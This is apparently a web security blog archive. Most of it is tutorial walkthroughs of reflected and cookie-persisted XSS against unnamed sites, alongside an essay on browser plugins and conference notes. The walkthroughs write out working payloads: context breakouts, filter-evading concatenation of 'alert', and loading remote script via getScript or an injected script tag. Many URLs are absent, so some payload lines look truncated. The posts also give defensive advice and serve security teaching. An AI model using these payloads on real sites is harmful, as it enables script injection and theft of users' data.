The Resurrected Skull

It’s been seven hours and fifteen days.

No. Wait. It’s been seven years and much more than fifteen days.

But nothing compares to the relief of finishing the 4th edition of The Anti-Hacker Toolkit. The book with the skull on its cover. A few final edits need to be wrangled, but they’re minor compared to the major rewrite this project entailed.

AHT 1st Edition

The final word count comes in around 200,000. That’s slightly over twice the length of Hacking Web Apps. (Or roughly 13,000 Tweets or 200 blog posts.) Those numbers are just trivia associated with the mechanics of writing. The reward of writing is the creative process and the (eventual…) final product.

In retrospect (and through the magnfying lens of self-criticism), some of the writing in the previous edition was awful. Some of it was just inconsistent with terminology and notation. Some of it was unduly sprinkled with empty phrases or sentences that should have been more concise. Fortunately, it apparently avoided terrible cliches (all cliches are terrible, I just wanted to emphasize my distaste for them).

Many tools have been excised; others have been added. A few pleaded to remain despite their questionable relevance (I’m looking at you, wardialers). But such content was trimmed to make way for the modern era of computers without modems or floppy drives.

The previous edition had a few quaint remarks, such as a reminder to save files to a floppy disk, references to COM ports, and astonishment at file sizes that weighed in at a few dozen megabytes. The word zombie appeared three times, although none of the instances were as threatening as the one that appeared in my last book.

Over the next few weeks I’ll post more about this new edition and introduce you to its supporting web site. This will give you a flavor for what the book contains better than any book-jacket marketing dazzle.

In spite of the time dedicated to the book, I’ve added 17 new posts this year. Five of them have broken into the most-read posts since January. So, while I take some down time from writing, check out the archives for items you may have missed.

And if you enjoy reading content here, please share it! Twitter has proven to be the best mechanism for gathering eyeballs. Also, consider pre-ordering the new 4th edition or checking out my current book on web security. In any case, thanks for stopping by.

Meanwhile, I’ll be relaxing to music. I’ve put Sinéad O’Connor in the queue; it’s a beautiful piece. (And a cover of a Prince song, which reminds me to put some Purple Rain in the queue, too). Then it’s on to a long set of Sisters of Mercy, Wumpscut, Skinny Puppy, and anything else that makes it feel like every day is Halloween.

Two Hearts That Beat As One

A common theme among injection attacks that manifest within a JavaScript context (e.g. <script> tags) is that proper payloads preserve proper syntax. We’ve belabored the point of this dark art with such dolorous repetition that even Professor Umbridge might approve.

We’ve covered the most basic of HTML injection exploits, exploits that need some tweaking to bypass weak filters, and different ways of constructing payloads to preserve their surrounding syntax. The typical process is choose a parameter (or a cookie!), find if and where its value shows up in a page, hack the page. It’s a single-minded purpose against a single injection vector.

Until now.

It’s possible to maintain this single-minded purpose, but to do so while focusing on two variables. This is an elusive beast of HTML injection in which an app reflects more than one parameter within the same page. It gives us more flexibility in the payloads, which sometimes helps evade certain kinds of patterns used in input filters or web app firewall rules.

This example targets two URL parameters used as arguments to a function that expects the start and end of a time period. Forget time, we’d like to start an attack and end with its success.

Here’s a version of the link with numeric arguments:

The app uses these values inside a <script> block, as follows:

var start = 1,
    end = 2;

$(JM.Scheduler.TimeZone.init(start, end));

The “normal” attack is simple:;//&end=2

This results in a successful alert(), but the app has some sort of silly check that strips the end value if it’s not greater than the start. Thus, you can’t have start=2&end=1. And the comparison always fails if you use a string for start, because end will never be greater than whatever the string is cast to (likely zero). At least the devs remembered to enforce numeric consistency in spite of security deficiency.

var start = alert(9);//,
    end = ;

$(JM.Scheduler.TimeZone.init(start, end));

But that’s inelegant compared with the attention to detail we’ve been advocating for exploit creation. The app won’t assign a value to end, thereby leaving us with a syntax error. To compound the issue, the developers have messed up their own code, leaving the browser to complain:

ReferenceError: Can’t find variable: $

Let’s see what we can do to help. For starters, we’ll just assign start to end (internally, the app has likely compared a string-cast-to-number with another string-cast-to-number, both of which fail identically, which lets the payload through). Then, we’ll resolve the undefined variable for them — but only because we want a clean error console upon delivering the attack.;//&end=start;$=null

var start = alert(9);//,
    end = start;$=null;

$(JM.Scheduler.TimeZone.init(start, end));

What’s interesting about “two factor” vulns like this is the potential for using them to bypass validation filters.[“ale”/*&end=*/%2b”rt”](9)

var start = window["ale"/*
    end = */+"rt"](9);

$(JM.Scheduler.TimeZone.init(start, end));

Rather than think about different ways to pop an alert() in someone’s browser, think about what could be possible if jQuery was already loaded in the page. Thanks to JavaScript’s design, it doesn’t even hurt to pass extra arguments to a function:$[“getSc”%2b”ript”](“”&end=undefined)

var start = $["getSc"+"ript"]("",
    end = undefined);

$(JM.Scheduler.TimeZone.init(start, end));

And if it’s necessary to further obfuscate the payload we might try this:$[start]%28%22//

var start = "getSc"+"ript",
    end = $[start]("//");

$(JM.Scheduler.TimeZone.init(start, end));

Maybe combining two parameters into one attack reminds you of the theme of two hearts from 80s music. Possibly U2’s War from 1983. I never said I wasn’t gonna tell nobody about a hack like this, just like that Stacey Q song a few years later — two of hearts, two hearts that beat as one. Or Phil Collins’ Two Hearts three years after that.

Although, if you forced me to choose between two hearts that beat as one, I’d choose a Timelord, of course. In particular, someone that preceded all that music: Tom Baker. Jelly Baby, anyone?
Tom Baker

A True XSS That Needs To Be False

It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied alert(). Sometimes, parsing an expression takes more effort that breaking it.

So, redirect your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:”onmouseover=alert(9);a=”

The page reflects the value of this id parameter within an href attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

<a href=" reference: "onmouseover=alert(9);a=""></a>

Yet the browser goes into an infinite redirect loop without ever launching the alert. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the <body> element — well after several other JavaScript functions and page content. It should have been present in the <head>. It’s like the developers knew they should do something about clickjacking, heard about a top.location trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

<script type="text/javascript">
if ( != '"onmouseover=alert(9);a="') { = '"onmouseover=alert(9);a="';

The URL in your browser bar may look exactly like the URL in the inequality test. However, the location.href property contains the URL-encoded (a.k.a. percent encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new location.href. As such, the following two strings are not identical:;a=%22”onmouseover=alert(9);a=”

Since the anti-framing triggers before the browser encounters the affected href, the onmouseover payload (or any other payload inserted in the tag) won’t trigger.

This isn’t a problem. Just redirect your onhack event from the href to the if statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. It makes the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the alert() and a Boolean operator to force a false outcome.

The new payload is


Which results in this:

<script type="text/javascript">
if ( != ''+alert(9)&&null=='') { = ''+alert(9)&&null=='';

Note that we could have used other operators to glue the alert() to its preceding string. Any arithmetic operator would have worked.

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:


This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with execution different contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. <script>) after the href, but the if statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page — URL encoding would have been a logical step.

A Hidden Benefit of HTML5

Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this task, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that works around validation filters and avoids being defeated by output encoding schemes. Sometimes it’s necessary to wander the dusty passages of parsing rules in search of a hidden door that opens an element to being exploited.


HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

And every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of an hidden input field. In the following example, note that the quotation mark has not been filtered or encoded.”

<input type="hidden" name="sortOn" value="x"">

If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless.”><script>alert(9)</script><z”

<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">

Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">

Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">

The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">

But modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, Attributes:

“There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.”

Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems; it’s to be avoided at all costs.

From the spec, Attribute name state

“When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

So, we’ll never be able to fool a browser by “casting” the input field to a different type by a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines parsing rules in HTML Living Standard section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >

HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection, but the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as
the absence of unmitigatable surprise“. Look for flaws in modern browsers where this trick works, (e.g. maybe a compatibility mode or not using an explicit <!doctype html> weakens the browser’s parsing algorithm). With luck, most of the problems you discover will be implementation errors to be fixed in a particular browser rather than a design change required of the spec.

HTML5 gives us a better design to help minimize parsing-based security problems. It’s up to web developers to design better sites to help maximize the security of our data.

JavaScript: A Syntax Oddity

Should you find yourself sitting in a tin can, far above the world, it’s reasonable to feel like there’s nothing you can do. Just stare out the window and remark that planet earth is blue.
Bowie Is Ticket
Should you find yourself writing a web app, with security out of this world, then it’s reasonable to feel like there’s something you forgot to do.

Here’s a web app that, at first glance, seems secure against HTML injection. However, all you have to do is tell the browser what it wants to know. Kind of like our floating Major Tom — the papers want to know whose shirts you wear.

Every countdown to an HTML injection exploit begins with a probe. Here’s a simple one:”autofocus/onfocus=alert(9);//&search-alias=something

The site responds with a classic reflection inside an <input> field. However, it foils the attack by HTML encoding the quotation mark. After several attempts, we have to admit there’s no way to escape the quoted string:

<input type="hidden" name="url"

Time to move on. But we’re only moving on from that particular payload. A diligent hacker pays attention to detail because, sometimes, that persistence pays off. (Regular readers might find this situation strangely familiar…)

Before we started mutating URL parameters, the link looked more like this:

One behavior that stood out for this page was the reflection of several URL parameters within a JavaScript block. In the original page, the JavaScript was minified and condensed to a single line. We’ll introduce the script block in a more readable composition that includes some indentation and line feeds in order to more clearly convey its semantics. The following script shows up further down the page; the key point to notice is the appearance of the number 412603031 from the node parameter:

  var i='DAaba0';

Essentially, it’s an anonymous function that takes four parameters, two of which are evidently the window and document objects since those show up in the calling arguments. If you’re having trouble conceptualizing the previous JavaScript, consider this reduced version:

  var i='DAaba0';

So, our goal must be to refine what gets delivered in place of the XSS characters in order to successfully execute arbitrary JavaScript.

The first step is to insert sufficient syntax to terminate the preceding tokens (e.g. function declaration, methods). This is as straightforward as counting parentheses and such. For example, the following gets us to a point where the JavaScript engine parses correctly up to the XSS.

  var i='DAaba0';

Notice in the previous example that we’ve closed the anonymous function, but there’s no need to execute it. This is the difference between (function(){})() and (function(){}) — we omitted the final () since we’re trying to avoid introducing parsing or execution errors preceding our payload.

Next, we find a payload that’s appropriate for the injection context. The reflection point is already within a JavaScript execution block. Hence, there’s no need to use a payload with <script> tags or other elements, nor do we need to rely on an intrinsic event like onfocus().

The simplest payload in this case would be alert(9). However, it appears the site might be rejecting any payload with the word “alert” in it. No problem, we’ll turn to a trivial obfuscation method:


Since we’re trying to cram several concepts into this tutorial, we’ll wrap the payload inside its own anonymous function. Incidentally, this kind of syntax has the potential to horribly confuse regular expressions with which a developer intended to match balanced parentheses.


Recall that in the original site all of the JavaScript was condensed to a single line. This makes it easy for us to clean up the remaining tokens to ensure the browser doesn’t complain about any subsequent parsing errors. Otherwise, the contents of the JavaScript block may not be executed. Therefore, we’ll try throwing in an opening comment delimiter, like this:


Oops. The payload fails. In fact, this was where one review of the vuln stopped. The payload never got so complicated as using the obfuscated alert, but it did include the trailing comment delimiter. Since the browser never executed any pop-ups, everyone gave up and called this a false positive.

Oh dear, it seems hackers can be as fallible as the developers that give us these nice vulns to chew on.

Take a look at the browser’s ever-informative error console. It tells us exactly what went wrong:

SyntaxError: Multiline comment was not closed properly

Everything following the payload falls on a single line. So, we really should have just used the single line comment delimiter:


And we’re done! (For extra points, try figuring out what the syntax might need to be if the JavaScript spanned multiple lines. Hint: This all started with an anonymous function.)

Here’s the whole payload inside the URL. Make sure to encode the plus operator as %2b — otherwise it’ll be misinterpreted as a space.’})});(function(){window[‘a’%2b’lert’](9)})()//&search-alias=something

And here’s the result within the script block. (WordPress’ syntax highlighting displays it accurately, which is another hint that we’ve modified the JavaScript context correctly.)


There are a few points to review in this example. Here’s a few hints for discovering and exploiting HTML injection:

  • Inspect the entire page for areas where a URL parameter name or value is reflected. Don’t stop at the first instance.
  • Use a payload appropriate for the reflection context. In this case, we could use raw JavaScript because the reflection appeared within a <script> element.
  • Write clean payloads. Terminate preceding tokens, comment out (or correctly open) following tokens. Pay attention to messages reported in the browser’s error console.
  • Don’t be foiled by sites that blacklist “alert”. Effective attacks don’t even need to use an alert() function. Know simple obfuscation techniques to bypass blacklists. (Obfuscation really just means an awareness of JavaScript’s objects, methods, semantics, and creativity.)
  • Use the JavaScript that’s already present. Most sites already have a library like jQuery loaded. Take advantage of $() to create new and exciting elements within the page.

And here’s a few hints for preventing it:

  • Use an encoding mechanism appropriate to the context where data from the client will be displayed. The site correctly used HTML encoding for " characters within the value attribute of an <input> tag, but forgot about dealing with the same value when it was inserted into a JavaScript context.
  • Use string concatenation at your peril. Create helper functions that are harder to misuse.
  • When you find one instance of a programming mistake or a bad programming pattern, search the entire code base for other instances — it’s quicker than waiting for another exploit to appear.
  • Realize that blacklisting “alert” won’t get you anywhere. Have an idea of how diverse HTML injection payloads can be.
  • Read a web site, read a book.

There’s nothing really odd about JavaScript syntax. It’s a flexible language with several ways of concatenating strings, casting types, and executing methods. We know developers can build sophisticated libraries with JavaScript. We know hackers can build sophisticated exploits with it.

We know Major Tom’s a junkie, strung out in Heaven’s high, hitting an all-time low. I have my own addiction, but the little green wheels following me are just so many HTML injection vulns, waiting to be discovered.

RVAsec 2013: JavaScript Security & HTML5

Here are the slides for my presentation at this year’s RVAsec, JavaScript Security & HTML5. Thanks to all who attended!

RVAsec, held in Richmond, VA, is a relatively new conference. But one complete with hardware badges, capture the flag, and pizza and donuts for breakfast. So, yeah, mark your calendar for next year; it’s a worthwhile trip.

This was an iteration on the web security topics I’ve been focused on for the last several months, so you’ll notice many familiar concepts from previous presentations. (And some more emphasis on privacy, which shouldn’t be forgotten on the modern web.) A great thing about being able to talk on these subjects is that it gives me a chance to improve the content based on feedback and questions, and adjust the flow to keep it engaging. Now I’m at the point where I have enough material to take off on new tangents and build new content — it’ll be a busy summer.

The Wrong Location for a Locale

Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encoding like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)Namárië

A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment — which doesn’t make a round trip to the web site — isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body> :

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&# 034;&gt;



And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&# 034;&gt;



And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;


" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example, we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">
<html xmlns="" lang="en-US">


" xml:lang="en-US">



And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!--  Include the Reference Page Tag script -->
<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US"&gt;



Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:”>%0A%0D’;alert(9)//

Too bad the apostrophe character (‘) remains encoded:

<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US&# 034;&gt;

&# 039;;alert(9)//';

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

As expected, the’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&# 034;&gt;

&lt;script src=&# 034; 034;&gt;&lt;/script&gt;


But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by

<html xmlns="" lang="en-US">

<script src=""></script>

" xml:lang="en-US">

<script src=""></script>


Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload — it’s just

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A;
        sessionLocale="en_US\">  <script src=\"\"></script>  ";

Sometime between the request to and the contact page the site decided to take the locale parameter from and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale. The locale isn’t as picturesque as Hogwarts, nor as destitute as District 12, but Hermione and Katniss would rip apart a vuln like this.Hermione's Exam Schedule

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert:

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And — spoiler alert — not in the following script block:

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site. Just visiting them as any user might without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!).”%2balert(9)%2b”

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click to Show Page Source we’re greeted with that happy hacker greeting, the friendly alert() window.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page) we narrow the persistent carrier to a cookie value. The cookie is a long string of hexadecimal digits whose length and content does not change between requests. This is a good hint that it’s some sort of UUID that points to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.

So, we have a persistent HTML injection tied to a user-tracking cookie. A diminishing factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice it we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Plugins Stand Out

A minor theme in my recent B-Sides SF presentation was the stagnancy of innovation since HTML4 was finalized in December 1999. New programming patterns emerged over that time, only to be hobbled by the outmoded spec. To help recall that era I scoured for ancient curiosities of the last millennium. (Like Geocities’ announcement of 2MB of free hosting space.) One item I came across was a Netscape advisory regarding a Java bytecode vulnerability — in March 1996.

March 1996 Java Bytecode Vulnerability

Almost twenty years later Java still plagues browsers with continuous critical patches released month after month after month, including March 2013.

Java: Write none, uninstall everywhere.

The primary complaint against browser plugins is not their legacy of security problems (the list of which is exhausting to read). Nor that Java is the only plugin to pick on. Flash has its own history of releasing nothing but critical updates. The greater issue is that even a secure plugin lives outside the browser’s Same Origin Policy (SOP).

When plugins exist outside the security and privacy controls enforced by browsers they weaken the browsing experience. It’s true that plugins aren’t completely independent of these controls, their instantiation and usage with regard to the DOM still falls under the purview of SOP. However, the ways that plugins extend a browser (such as network and file access) are rife with security and privacy pitfalls.

For one example, Flash’s Local Storage Object (LSO) was easily abused as an “evercookie” because it was unaffected by clearing browser cookies and even how browsers decided to accept cookies or not. Yes, it’s still possible to abuse HTTP and HTML to establish evercookies. Even the lauded HTML5 Local Storage API could be abused in a similar manner. It’s for reasons like these that we should be as diligent about demanding “privacy patches” as much as we demand security fixes.

Unlike Flash, an HTML5 API like Local Storage is an open standard created by groups who review and balance the usability, security, and privacy implications of features designed to improve the browsing experience. Establishing a feature like Local Storage in the HTML spec and aligning it with similar concepts like cookies and security controls like SOP (or HTML5 features like CORS, CSP, etc.) makes them a superior implementation in terms of integrating with users’ expectations and browser behavior. Instead of one vendor providing a means to extend a browser, browser vendors (the number of which is admittedly dwindling) are competing with each other to implement a uniform standard.

Sure, HTML5 brings new risks and preserves old vulnerabilities in new and interesting ways, but a large responsibility for those weaknesses lies with developers who would misuse an HTML5 feature in the same way they might have misused XHR and JSONP in the past. Maybe we’ll start finding plaintext passwords in Local Storage objects, or more sophisticated XSS exploits using Web Workers and WebSockets to scour data from a compromised browser. Security ignorance takes a long time to fix. And even experienced developers are challenged by maintaining the security of complex web applications.

HTML5 promises to obviate plugins altogether. We’ll have markup to handle video, drawing, sound, more events, and more features to create engaging games and apps. Browsers will compete on the implementation and security of these features rather than be crippled by the presence of plugins out of their control.

Getting rid of plugins makes our browsers more secure, but adopting HTML5 doesn’t imply browsers and web sites become secure. There are still vulnerabilities that we can’t fix by simple application design choices like including X-Frame-Options or adopting Content Security Policy headers.


It’ll be a long time before everyone’s comfortable with the Dirty Harry test. Would you click on an unknown link — better yet, scan an inscrutable QR code — with your current browser? Would you still do it with multiple tabs open to your email, bank, and social networking accounts?

Who cares if “the network is the computer” or an application lives in the “cloud” or it’s offered via something as a service? It’s your browser that’s the door to web apps and when it’s not secure, an open window to your data.

RSA US 2013, ASEC-F41 Slides

Here are the slides for my presentation, Using HTML5 WebSockets Securely, at this year’s RSA US conference in San Francisco.

It’s a continuation of the content created for last year’s BlackHat and BayThreat presentations. RSA wants slides to be in a specific template. So, these slides are less visually stimulating than I usually have the freedom to create. (RSA demands an “Apply” slide at the end. Otherwise they don’t know if you told attendees how to apply what you were talking about for the last 45 minutes.) Still, the slides should convey some useful concepts for understanding and working with WebSockets.

This is hardly the end for this topic. But there’s a long list of other material that I need to finish before this protocol gets more attention.

%d bloggers like this: